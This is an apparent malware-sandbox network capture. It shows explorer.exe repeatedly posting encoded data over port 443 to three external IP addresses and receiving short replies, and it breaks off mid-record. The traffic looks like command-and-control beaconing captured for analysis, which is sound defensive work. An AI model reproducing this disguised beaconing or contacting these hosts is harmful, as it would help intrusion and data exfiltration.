2024-07-27 05:31:39 UTC	1122	OUT	Data Raw: 61 59 75 50 46 32 4d 36 62 51 4f 61 4e 42 36 70 4d 44 4a 6b 69 37 59 59 68 34 78 51 67 31 73 62 6f 33 4a 59 43 35 32 55 49 6b 74 6d 49 4a 4f 65 7a 44 50 47 4f 72 45 37 75 50 56 4b 6e 58 54 72 41 52 69 6c 6a 67 6e 4e 4f 4e 43 64 61 56 66 66 46 73 49 6c 42 34 6c 54 30 50 56 50 2f 43 48 65 74 64 50 38 72 41 7a 32 31 48 65 42 38 45 41 4b 51 4a 48 68 6f 65 75 2f 7a 6d 72 42 72 6e 44 48 78 7a 53 2f 73 72 66 6c 4d 4a 39 6e 39 62 32 6c 50 77 74 6b 34 5a 37 48 44 53 53 58 4d 6a 73 4c 74 47 6d 38 47 54 65 71 54 38 4d 51 74 76 54 48 77 7a 69 34 6f 2f 69 41 72 71 52 79 46 51 61 53 36 66 46 77 63 56 68 31 79 37 69 6a 58 65 37 34 6c 65 50 44 37 42 35 6b 42 35 46 6b 30 63 47 66 70 71 57 6f 41 6b 70 62 54 50 68 69 63 4a 6e 2f 63 78 67 79 30 76 52 63 45 6b 6a 57 67 4d 4e Data Ascii: aYuPF2M6bQOaNB6pMDJki7YYh4xQg1sbo3JYC52UIktmIJOezDPGOrE7uPVKnXTrARiljgnNONCdaVffFsIlB4lT0PVP/CHetdP8rAz21HeB8EAKQJHhoeu/zmrBrnDHxzS/srflMJ9n9b2lPwtk4Z7HDSSXMjsLtGm8GTeqT8MQtvTHwzi4o/iArqRyFQaS6fFwcVh1y7ijXe74lePD7B5kB5Fk0cGfpqWoAkpbTPhicJn/cxgy0vRcEkjWgMN
2024-07-27 05:31:40 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:40 UTC	685	IN	Data Raw: 56 46 6e 65 53 43 4f 77 6a 34 78 4d 6b 79 50 72 61 33 36 6e 46 72 5a 57 64 59 48 30 66 70 33 38 37 65 45 37 36 62 6f 2f 2b 55 4e 4a 74 48 33 4a 7a 64 5a 2f 77 34 2b 31 4c 58 4c 57 75 30 75 69 59 46 6e 37 62 52 6c 57 73 39 39 4b 47 77 42 31 72 68 57 53 4e 70 43 39 52 51 57 71 72 6f 75 41 61 6e 59 59 66 6c 51 78 77 4d 4e 55 64 6b 56 79 48 6b 4c 70 46 6d 67 6e 46 73 30 52 31 65 6a 6c 5a 51 62 63 77 6a 49 49 36 78 34 39 6e 68 50 44 6c 5a 52 70 73 52 36 6c 38 50 58 49 61 46 65 76 4a 44 4e 63 49 6b 33 61 49 43 4d 54 6b 56 6a 37 49 4e 47 49 61 64 37 67 32 66 52 68 33 51 79 44 78 6b 2f 62 44 37 75 6c 35 67 6c 62 58 56 53 50 4e 76 39 2b 59 67 36 49 33 50 70 48 58 49 52 68 41 6b 42 5a 59 67 5a 35 6f 45 71 4d 41 65 4e 44 65 46 75 35 78 45 70 75 58 4c 6b 4e 32 66 63 Data Ascii: VFneSCOwj4xMkyPra36nFrZWdYH0fp387eE76bo/+UNJtH3JzdZ/w4+1LXLWu0uiYFn7bRlWs99KGwB1rhWSNpC9RQWqrouAanYYflQxwMNUdkVyHkLpFmgnFs0R1ejlZQbcwjII6x49nhPDlZRpsR6l8PXIaFevJDNcIk3aICMTkVj7INGIad7g2fRh3QyDxk/bD7ul5glbXVSPNv9+Yg6I3PpHXIRhAkBZYgZ5oEqMAeNDeFu5xEpuXLkN2fc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	51879	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:41 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:41 UTC	1122	OUT	Data Raw: 49 56 31 77 50 6b 66 54 46 64 63 6a 46 5a 43 6f 63 6b 42 51 2b 6e 43 74 6e 73 31 45 33 5a 75 41 73 67 44 41 4f 42 68 7a 51 68 7a 2f 6c 53 49 41 6f 50 68 46 63 44 4a 30 4f 54 49 79 54 6b 6e 6b 32 54 4a 72 37 70 65 52 34 50 48 64 78 30 4c 5a 68 4a 6b 6f 75 37 30 2b 44 39 74 5a 78 4d 55 74 48 44 74 37 52 67 65 50 43 48 45 57 62 47 4e 70 78 67 36 4c 78 74 75 71 4b 38 7a 61 75 73 50 41 6b 77 6d 70 52 4e 42 47 76 4f 6c 67 48 31 37 52 52 4d 41 4c 35 4f 52 6f 6e 50 75 37 2f 41 43 5a 39 62 33 32 69 71 54 69 4e 5a 73 6c 70 66 52 54 37 6f 69 4f 42 31 41 38 4f 34 4d 6d 30 44 62 37 74 46 74 4f 42 7a 5a 69 6e 46 4b 37 59 69 70 6c 4b 2f 77 44 49 6e 30 6d 4f 46 68 76 77 58 77 4c 36 4d 6b 53 55 38 6f 68 79 53 73 31 38 33 6e 6e 35 68 57 64 4b 41 6b 54 6d 73 48 33 53 6f 6c Data Ascii: IV1wPkfTFdcjFZCockBQ+nCtns1E3ZuAsgDAOBhzQhz/lSIAoPhFcDJ0OTIyTknk2TJr7peR4PHdx0LZhJkou70+D9tZxMUtHDt7RgePCHEWbGNpxg6LxtuqK8zausPAkwmpRNBGvOlgH17RRMAL5ORonPu7/ACZ9b32iqTiNZslpfRT7oiOB1A8O4Mm0Db7tFtOBzZinFK7YiplK/wDIn0mOFhvwXwL6MkSU8ohySs183nn5hWdKAkTmsH3Sol
2024-07-27 05:31:42 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:42 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:42 UTC	685	IN	Data Raw: 54 61 54 49 49 34 65 64 59 4f 65 30 38 61 32 59 55 4d 2b 4a 4c 46 54 59 35 73 6f 2b 4a 37 34 4b 62 74 50 6f 4e 32 51 75 62 31 33 6d 55 41 70 4e 69 61 4d 6c 67 37 49 39 76 64 4e 2b 6c 45 62 6b 4d 65 41 4f 6c 39 38 63 77 7a 76 33 6e 70 47 63 72 35 63 34 70 4f 4a 68 33 35 76 37 79 47 37 62 78 56 72 5a 4d 32 4d 6b 4f 68 5a 77 79 6c 56 52 2b 45 65 4d 59 42 44 2f 46 65 49 6a 68 59 4d 4b 46 79 57 71 5a 44 55 42 66 53 79 6c 54 4e 5a 67 46 61 4d 30 7a 33 33 71 6b 4b 69 6f 42 7a 50 55 30 36 44 37 2b 4d 74 68 4f 54 68 7a 50 4a 31 59 4e 52 72 41 65 34 67 56 31 4d 2b 56 53 78 52 72 44 71 56 2b 45 56 49 45 62 30 44 35 51 5a 59 70 71 42 72 68 52 61 6b 38 64 58 70 2b 77 33 6e 54 61 6f 72 74 79 41 74 42 50 30 4d 33 58 59 45 31 67 35 39 50 4c 35 51 41 6e 6b 74 38 34 6e 70 Data Ascii: TaTII4edYOe08a2YUM+JLFTY5so+J74KbtPoN2Qub13mUApNiaMlg7I9vdN+lEbkMeAOl98cwzv3npGcr5c4pOJh35v7yG7bxVrZM2MkOhZwylVR+EeMYBD/FeIjhYMKFyWqZDUBfSylTNZgFaM0z33qkKioBzPU06D7+MthOThzPJ1YNRrAe4gV1M+VSxRrDqV+EVIEb0D5QZYpqBrhRak8dXp+w3nTaortyAtBP0M3XYE1g59PL5QAnkt84np

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	51880	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:43 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:43 UTC	1122	OUT	Data Raw: 63 52 72 68 2f 62 6d 35 50 48 77 5a 30 51 58 4c 70 63 74 78 48 42 51 34 73 2b 53 53 64 66 52 63 55 44 43 72 34 79 4f 33 33 6f 42 4a 6b 51 52 31 66 35 68 6a 79 79 6b 68 52 41 69 76 30 4a 55 4e 75 36 49 59 72 4d 52 61 50 4d 51 74 66 54 71 48 66 66 32 71 74 2f 4c 6d 71 57 65 59 37 75 57 6f 64 49 44 55 63 66 48 38 4d 54 6d 47 38 49 62 50 77 4b 2f 6a 70 48 34 33 4d 42 49 4f 77 64 70 50 69 6c 57 66 6a 32 44 50 68 2b 41 30 62 55 55 46 6c 6d 68 72 43 6a 71 6b 4e 32 45 39 53 77 2b 76 6c 65 6f 46 69 37 76 4f 6b 2f 68 6a 4f 32 66 75 44 69 49 42 6b 48 53 64 57 4f 36 53 77 77 44 77 59 33 56 4c 4d 76 2b 46 62 6d 74 67 65 44 62 77 78 35 39 56 52 77 63 6a 76 67 69 6d 6a 75 49 30 51 4f 78 68 47 62 78 63 78 6b 6a 59 4f 65 33 4b 78 61 62 30 6f 57 4e 62 4e 4f 55 30 6f 71 6e Data Ascii: cRrh/bm5PHwZ0QXLpctxHBQ4s+SSdfRcUDCr4yO33oBJkQR1f5hjyykhRAiv0JUNu6IYrMRaPMQtfTqHff2qt/LmqWeY7uWodIDUcfH8MTmG8IbPwK/jpH43MBIOwdpPilWfj2DPh+A0bUUFlmhrCjqkN2E9Sw+vleoFi7vOk/hjO2fuDiIBkHSdWO6SwwDwY3VLMv+FbmtgeDbwx59VRwcjvgimjuI0QOxhGbxcxkjYOe3Kxab0oWNbNOU0oqn
2024-07-27 05:31:44 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:44 UTC	685	IN	Data Raw: 47 73 4f 4a 65 4c 6d 5a 44 6c 4a 62 44 75 36 54 35 53 39 43 67 6f 37 4a 53 6c 2f 64 70 65 4d 2f 62 72 35 45 77 50 51 68 7a 59 6d 54 72 2b 77 78 77 74 51 65 73 33 2b 50 57 2f 65 43 73 68 42 6e 42 2b 57 6c 59 38 6f 30 6a 6b 4e 67 6d 51 2f 6d 4c 33 41 77 46 2f 42 73 43 33 75 6e 6d 4e 48 53 62 6a 2f 41 7a 75 6b 47 54 41 68 64 59 38 5a 72 64 32 2b 73 43 59 39 55 63 6f 71 68 5a 6e 6c 45 38 73 45 46 52 4e 53 4e 41 71 4e 2b 5a 53 38 45 2f 4c 35 46 65 51 73 65 42 6e 78 65 72 5a 44 52 4f 66 69 45 56 78 48 30 64 59 6f 72 64 73 31 38 34 79 63 49 46 4a 71 70 70 65 6e 4b 2b 31 64 66 30 2f 34 32 35 38 48 34 4b 39 4e 43 75 79 5a 53 33 63 6b 54 4f 35 51 69 67 70 71 68 47 72 6a 6a 6c 31 69 69 49 74 72 4c 63 63 71 6c 31 71 78 4b 62 6c 6a 55 58 31 70 63 4e 5a 64 57 6b 6e 51 Data Ascii: GsOJeLmZDlJbDu6T5S9Cgo7JSl/dpeM/br5EwPQhzYmTr+wxwtQes3+PW/eCshBnB+WlY8o0jkNgmQ/mL3AwF/BsC3unmNHSbj/AzukGTAhdY8Zrd2+sCY9UcoqhZnlE8sEFRNSNAqN+ZS8E/L5FeQseBnxerZDROfiEVxH0dYords184ycIFJqppenK+1df0/4258H4K9NCuyZS3ckTO5QigpqhGrjjl1iiItrLccql1qxKbljUX1pcNZdWknQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	51881	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:45 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:45 UTC	1122	OUT	Data Raw: 57 52 35 36 4c 52 57 46 58 44 34 42 70 47 34 45 43 57 75 30 34 37 67 6e 77 55 70 63 33 66 66 32 42 41 39 6a 45 30 37 55 4c 56 39 67 53 4e 41 4d 70 48 56 67 6d 5a 4e 64 67 4f 71 49 6e 46 78 74 69 4b 74 4a 78 4c 42 59 53 31 57 51 6e 6c 47 6d 46 64 31 4e 46 4b 78 37 4c 6f 75 53 56 35 45 34 72 71 4c 4e 52 6f 30 56 45 32 54 6f 6e 2b 6f 4d 70 34 46 59 42 62 4b 33 57 6d 64 68 46 35 7a 4e 45 35 42 6a 73 4a 74 32 58 59 39 6e 6e 48 4c 4a 46 56 45 45 54 44 38 49 32 59 36 43 34 78 49 54 4b 63 36 6b 63 6e 32 56 38 6a 46 78 4a 65 56 71 4e 43 2b 63 43 38 56 62 74 52 44 47 59 37 79 48 64 30 70 76 4d 78 4a 77 6d 34 55 38 42 47 66 39 71 6f 41 59 6d 77 31 78 54 4c 41 65 39 46 43 53 49 4b 58 73 6c 41 65 6e 44 45 69 46 41 39 61 4b 31 49 51 78 6c 59 47 7a 71 2f 75 63 2f 75 57 Data Ascii: WR56LRWFXD4BpG4ECWu047gnwUpc3ff2BA9jE07ULV9gSNAMpHVgmZNdgOqInFxtiKtJxLBYS1WQnlGmFd1NFKx7LouSV5E4rqLNRo0VE2Ton+oMp4FYBbK3WmdhF5zNE5BjsJt2XY9nnHLJFVEETD8I2Y6C4xITKc6kcn2V8jFxJeVqNC+cC8VbtRDGY7yHd0pvMxJwm4U8BGf9qoAYmw1xTLAe9FCSIKXslAenDEiFA9aK1IQxlYGzq/uc/uW
2024-07-27 05:31:46 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:46 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:46 UTC	685	IN	Data Raw: 66 69 33 70 43 4d 6b 73 77 2b 39 6f 32 67 63 68 6d 5a 74 34 6c 64 32 30 59 6f 69 43 6b 30 75 6a 54 2b 6f 2b 41 4a 32 35 71 6e 36 73 72 6f 56 31 4f 30 4c 2f 66 65 58 78 47 6d 59 62 61 39 66 4c 6a 35 4a 76 63 39 43 69 36 69 4e 76 54 63 7a 6c 4e 35 2b 36 33 33 51 72 6f 4e 37 70 55 6b 43 63 7a 6a 49 63 47 67 41 45 49 2f 73 52 50 36 6f 47 66 4b 73 59 41 6e 53 38 46 35 6d 49 2b 6e 4f 58 72 44 56 37 41 63 69 66 59 6b 78 31 73 49 61 71 4c 6c 33 63 61 4d 42 6b 6a 33 45 70 48 4c 2f 38 39 59 4a 66 6e 36 35 57 41 45 32 68 4d 5a 6b 32 39 4f 55 47 2b 6d 35 4a 57 46 50 31 38 5a 52 54 69 63 48 43 75 5a 7a 47 77 56 30 33 5a 31 79 4f 6a 35 51 34 46 44 30 50 75 46 33 4b 6b 4f 4d 77 57 77 4b 5a 48 53 6e 44 57 42 6a 4a 49 56 33 55 6a 4a 35 56 49 49 76 2f 33 75 47 42 64 6c 2b Data Ascii: fi3pCMksw+9o2gchmZt4ld20YoiCk0ujT+o+AJ25qn6sroV1O0L/feXxGmYba9fLj5Jvc9Ci6iNvTczlN5+633QroN7pUkCczjIcGgAEI/sRP6oGfKsYAnS8F5mI+nOXrDV7AcifYkx1sIaqLl3caMBkj3EpHL/89YJfn65WAE2hMZk29OUG+m5JWFP18ZRTicHCuZzGwV03Z1yOj5Q4FD0PuF3KkOMwWwKZHSnDWBjJIV3UjJ5VIIv/3uGBdl+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	51882	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:47 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:47 UTC	1122	OUT	Data Raw: 6f 50 32 77 4e 57 4a 63 5a 75 69 4d 46 4d 47 56 2b 57 4f 37 73 70 4d 66 42 48 32 67 50 4e 4b 6d 6d 77 66 54 70 4b 38 56 6d 53 64 45 41 6c 37 6f 52 4d 63 51 50 32 6f 55 33 75 6f 4d 57 57 36 63 75 55 2f 6f 71 45 46 75 42 4b 71 31 6d 47 78 36 36 56 65 78 4b 5a 4a 4f 69 48 63 2b 32 71 6f 4d 50 51 45 45 4d 45 58 75 45 39 6b 5a 5a 46 55 34 68 44 70 41 75 6e 4e 4e 4d 30 64 36 49 76 6d 57 58 79 2f 75 43 65 6f 46 6b 4f 32 66 2b 5a 64 64 56 38 4f 2b 30 48 6a 33 49 36 4b 41 7a 49 66 46 62 41 69 73 78 47 71 41 4c 43 77 36 50 57 39 78 4b 6d 76 59 54 30 47 7a 73 45 38 4a 76 6c 41 5a 57 46 56 45 38 56 42 2f 33 37 2f 37 71 37 50 62 34 34 49 45 58 6b 53 69 4a 6f 64 68 32 73 2f 76 50 72 63 59 47 69 48 4d 64 75 59 76 61 5a 51 44 32 6c 38 5a 4a 44 2f 63 59 44 58 6d 32 79 38 Data Ascii: oP2wNWJcZuiMFMGV+WO7spMfBH2gPNKmmwfTpK8VmSdEAl7oRMcQP2oU3uoMWW6cuU/oqEFuBKq1mGx66VexKZJOiHc+2qoMPQEEMEXuE9kZZFU4hDpAunNNM0d6IvmWXy/uCeoFkO2f+ZddV8O+0Hj3I6KAzIfFbAisxGqALCw6PW9xKmvYT0GzsE8JvlAZWFVE8VB/37/7q7Pb44IEXkSiJodh2s/vPrcYGiHMduYvaZQD2l8ZJD/cYDXm2y8
2024-07-27 05:31:48 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:48 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:48 UTC	685	IN	Data Raw: 41 4f 61 51 32 35 71 71 42 66 48 54 4d 72 52 51 67 58 30 64 78 64 4f 37 58 35 56 55 36 52 42 79 4d 6b 56 77 67 37 62 55 56 6e 45 48 74 6c 68 45 31 7a 2b 38 32 6f 53 58 62 47 52 57 76 76 35 64 5a 64 71 46 2b 32 68 64 35 62 6a 72 37 73 6a 4b 63 2b 51 6a 52 38 2b 71 56 4c 54 70 35 2f 73 43 68 76 79 31 4a 4b 6c 65 32 38 72 59 67 4d 38 77 74 68 78 39 6b 4f 66 54 44 6e 59 75 36 53 63 50 31 32 72 31 4d 55 48 42 37 73 48 45 52 7a 4b 66 72 77 50 51 70 61 68 57 64 47 4d 76 58 7a 6b 70 53 46 73 75 68 61 67 6e 62 31 41 35 6d 48 79 61 41 2f 78 78 47 2b 73 30 50 79 33 54 75 72 63 4b 6c 35 69 44 62 2b 32 6b 65 63 59 49 4b 30 70 34 72 37 61 6b 4b 37 33 35 4a 43 38 71 4b 67 63 4a 58 58 4e 33 4e 36 78 57 4d 44 6f 77 70 67 74 41 73 51 72 78 6d 62 51 66 66 6f 4d 6b 74 78 6a Data Ascii: AOaQ25qqBfHTMrRQgX0dxdO7X5VU6RByMkVwg7bUVnEHtlhE1z+82oSXbGRWvv5dZdqF+2hd5bjr7sjKc+QjR8+qVLTp5/sChvy1JKle28rYgM8wthx9kOfTDnYu6ScP12r1MUHB7sHERzKfrwPQpahWdGMvXzkpSFsuhagnb1A5mHyaA/xxG+s0Py3TurcKl5iDb+2kecYIK0p4r7akK735JC8qKgcJXXN3N6xWMDowpgtAsQrxmbQffoMktxj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	51883	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:49 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:31:49 UTC	1267	OUT	Data Raw: 62 44 45 6c 6e 61 50 72 65 57 75 53 79 73 69 35 42 50 57 36 70 31 4b 48 61 64 6a 78 76 52 6e 58 75 71 38 55 6f 74 65 7a 77 77 4b 44 63 36 46 49 46 43 32 6e 6c 6f 64 44 6d 45 4f 56 71 66 37 32 61 63 51 72 6e 69 49 68 6a 2f 6e 42 2f 51 52 53 78 59 50 50 48 6a 55 53 49 51 6e 35 73 31 79 2f 77 4a 6f 76 68 59 4c 2b 73 41 55 4d 35 36 5a 4f 38 7a 6c 37 70 79 55 63 54 52 33 4c 79 46 72 43 61 46 36 53 70 34 69 64 71 61 50 5a 31 67 2b 6a 7a 32 37 7a 6b 77 6f 45 75 4a 4a 37 46 68 4a 53 33 4d 2f 6b 4e 64 49 47 44 6a 50 71 78 78 47 35 31 54 4b 4b 72 72 47 2b 34 58 55 6c 73 56 44 70 79 52 4d 31 53 4b 52 35 75 76 67 4d 4b 6f 65 48 62 32 73 39 33 74 77 2b 4a 4e 37 42 58 51 36 45 7a 61 4a 4b 69 66 4d 52 6c 6c 36 42 61 5a 43 42 65 64 72 45 63 34 32 67 4c 35 6a 48 52 58 71 Data Ascii: bDElnaPreWuSysi5BPW6p1KHadjxvRnXuq8UotezwwKDc6FIFC2nlodDmEOVqf72acQrniIhj/nB/QRSxYPPHjUSIQn5s1y/wJovhYL+sAUM56ZO8zl7pyUcTR3LyFrCaF6Sp4idqaPZ1g+jz27zkwoEuJJ7FhJS3M/kNdIGDjPqxxG51TKKrrG+4XUlsVDpyRM1SKR5uvgMKoeHb2s93tw+JN7BXQ6EzaJKifMRll6BaZCBedrEc42gL5jHRXq
2024-07-27 05:31:50 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:50 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:50 UTC	685	IN	Data Raw: 4c 2f 55 2f 42 48 59 47 41 4d 2b 36 59 54 74 49 4b 35 78 4f 4f 71 56 41 37 62 78 2f 57 2f 32 56 37 56 6a 5a 41 69 38 4c 34 66 4c 76 2b 61 74 79 5a 37 46 43 66 38 4b 70 63 53 62 59 77 79 38 2f 4f 62 7a 67 76 61 4d 52 57 4c 68 72 2b 41 36 44 6b 47 6a 6c 51 56 63 7a 33 30 67 50 63 76 52 72 75 70 32 57 76 48 36 77 47 36 6f 58 7a 45 70 72 66 38 7a 74 5a 53 54 54 44 4e 6e 33 46 51 30 41 4e 69 54 66 37 6c 43 51 61 4b 56 47 6d 4c 59 39 59 51 65 54 78 73 30 75 51 2f 4e 44 57 45 72 4c 6c 33 65 57 70 42 4f 35 73 71 4a 2f 44 6a 6f 56 37 2b 50 63 31 69 6c 62 72 38 76 48 6b 4f 6b 36 4f 6e 58 7a 57 51 33 61 43 47 41 49 59 62 59 45 30 6e 39 4a 36 74 37 6b 67 69 6d 58 66 54 55 34 56 51 4c 69 36 39 35 57 67 56 6d 66 69 52 35 35 6f 4d 34 50 52 6e 78 66 55 4c 36 62 49 76 64 Data Ascii: L/U/BHYGAM+6YTtIK5xOOqVA7bx/W/2V7VjZAi8L4fLv+atyZ7FCf8KpcSbYwy8/ObzgvaMRWLhr+A6DkGjlQVcz30gPcvRrup2WvH6wG6oXzEprf8ztZSTTDNn3FQ0ANiTf7lCQaKVGmLY9YQeTxs0uQ/NDWErLl3eWpBO5sqJ/DjoV7+Pc1ilbr8vHkOk6OnXzWQ3aCGAIYbYE0n9J6t7kgimXfTU4VQLi695WgVmfiR55oM4PRnxfUL6bIvd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	51884	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:51 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:51 UTC	1122	OUT	Data Raw: 71 61 31 63 2f 35 5a 54 7a 52 78 41 72 49 66 43 7a 34 44 39 72 4b 64 38 77 64 32 61 6c 63 54 4d 36 2b 74 46 4f 5a 2f 54 47 51 6c 48 75 63 62 4f 30 75 73 34 6c 4a 2b 44 50 54 4d 38 33 51 66 6b 4f 51 52 6e 56 42 6c 47 47 70 34 54 30 6c 47 6e 4d 71 75 65 56 73 79 65 6b 73 33 4d 77 77 74 31 44 31 53 77 52 58 75 58 70 64 32 61 79 44 42 54 79 46 69 38 2f 77 38 70 41 43 2b 75 48 41 2f 71 4a 2f 4c 46 75 76 47 61 46 34 43 79 32 75 73 65 56 37 6e 68 43 38 53 65 34 46 42 47 67 59 70 30 34 57 52 39 55 6a 41 58 45 41 50 4f 4f 4b 73 33 47 4b 78 46 4c 51 4d 38 30 70 33 72 61 69 72 35 59 63 75 49 4a 71 42 7a 38 68 32 4a 2b 36 47 4e 38 44 49 39 51 47 64 48 66 68 48 66 61 50 52 77 5a 6b 62 4c 4e 49 4c 39 42 6f 36 48 58 6f 6e 6d 4b 42 77 30 61 49 77 6d 70 72 38 39 61 56 66 Data Ascii: qa1c/5ZTzRxArIfCz4D9rKd8wd2alcTM6+tFOZ/TGQlHucbO0us4lJ+DPTM83QfkOQRnVBlGGp4T0lGnMqueVsyeks3Mwwt1D1SwRXuXpd2ayDBTyFi8/w8pAC+uHA/qJ/LFuvGaF4Cy2useV7nhC8Se4FBGgYp04WR9UjAXEAPOOKs3GKxFLQM80p3rair5YcuIJqBz8h2J+6GN8DI9QGdHfhHfaPRwZkbLNIL9Bo6HXonmKBw0aIwmpr89aVf
2024-07-27 05:31:52 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:31:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:31:52 UTC	685	IN	Data Raw: 42 31 6a 48 52 33 50 35 61 35 50 6c 37 31 38 4b 6a 6c 63 75 41 2b 45 71 34 42 4d 53 78 6d 50 2f 35 44 7a 76 70 54 63 4f 44 7a 36 6e 4d 4c 43 6c 71 4c 54 6a 64 2b 54 72 37 68 73 50 59 4e 6b 6c 66 2b 76 2b 44 75 4f 66 49 2b 4f 31 64 33 31 64 45 75 6c 39 78 64 47 6b 61 48 4e 6d 54 78 55 6f 71 64 6f 36 4f 48 50 61 59 7a 4f 50 61 6c 78 6f 79 34 35 68 32 78 79 70 4f 50 6d 53 4f 64 6a 4e 56 2f 4d 57 38 69 6b 66 63 53 5a 4d 70 6c 64 6f 57 52 34 67 74 50 75 46 72 6b 4a 48 77 57 57 44 72 30 62 2f 66 46 79 4b 30 39 6d 57 6e 45 57 6a 63 2b 6a 4b 4f 64 64 65 53 30 59 36 53 6d 59 79 41 58 6e 31 30 30 44 48 32 76 6a 4a 57 35 57 2b 52 59 66 6a 59 48 57 7a 74 4a 43 57 56 4e 46 67 4e 57 73 34 6a 62 78 4d 61 79 34 72 35 67 65 69 39 38 79 76 6d 53 74 30 4b 73 39 69 56 63 59 Data Ascii: B1jHR3P5a5Pl718KjlcuA+Eq4BMSxmP/5DzvpTcODz6nMLClqLTjd+Tr7hsPYNklf+v+DuOfI+O1d31dEul9xdGkaHNmTxUoqdo6OHPaYzOPalxoy45h2xypOPmSOdjNV/MW8ikfcSZMpldoWR4gtPuFrkJHwWWDr0b/fFyK09mWnEWjc+jKOddeS0Y6SmYyAXn100DH2vjJW5W+RYfjYHWztJCWVNFgNWs4jbxMay4r5gei98yvmSt0Ks9iVcY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	51885	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:31:53 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:31:53 UTC	1122	OUT	Data Raw: 43 44 49 2b 4d 61 6b 34 39 2f 4a 2f 30 30 75 2f 72 4e 4f 7a 6e 35 34 4d 69 6c 67 39 53 61 38 39 58 63 68 50 77 78 50 67 48 77 35 57 70 51 44 32 4e 6e 32 62 57 6e 45 30 48 6f 35 4b 73 69 6d 7a 4b 30 54 4f 47 42 6b 79 79 30 78 69 5a 32 2b 4c 33 4f 33 71 6c 4e 45 70 70 66 59 4e 45 37 73 64 46 37 7a 77 62 42 70 37 73 6c 33 35 7a 4b 71 6a 6c 68 77 66 51 61 42 41 4a 70 30 67 62 4b 75 31 36 45 31 6d 53 50 36 6d 6a 7a 76 41 57 68 4c 36 76 45 6d 66 7a 38 52 51 49 69 73 45 4a 4a 6d 70 32 4d 77 67 37 78 51 63 75 2f 6c 56 6f 6d 59 70 6f 4f 73 6e 6d 49 7a 7a 47 6c 42 75 62 54 33 38 53 51 50 39 4c 69 68 2f 7a 4d 4e 62 68 51 37 4c 5a 73 76 74 67 70 69 2b 68 34 45 69 77 4c 42 5a 48 63 73 73 77 66 78 67 48 6c 72 59 34 44 2f 67 4f 6c 43 47 66 36 44 30 57 76 6d 61 74 6b 6b Data 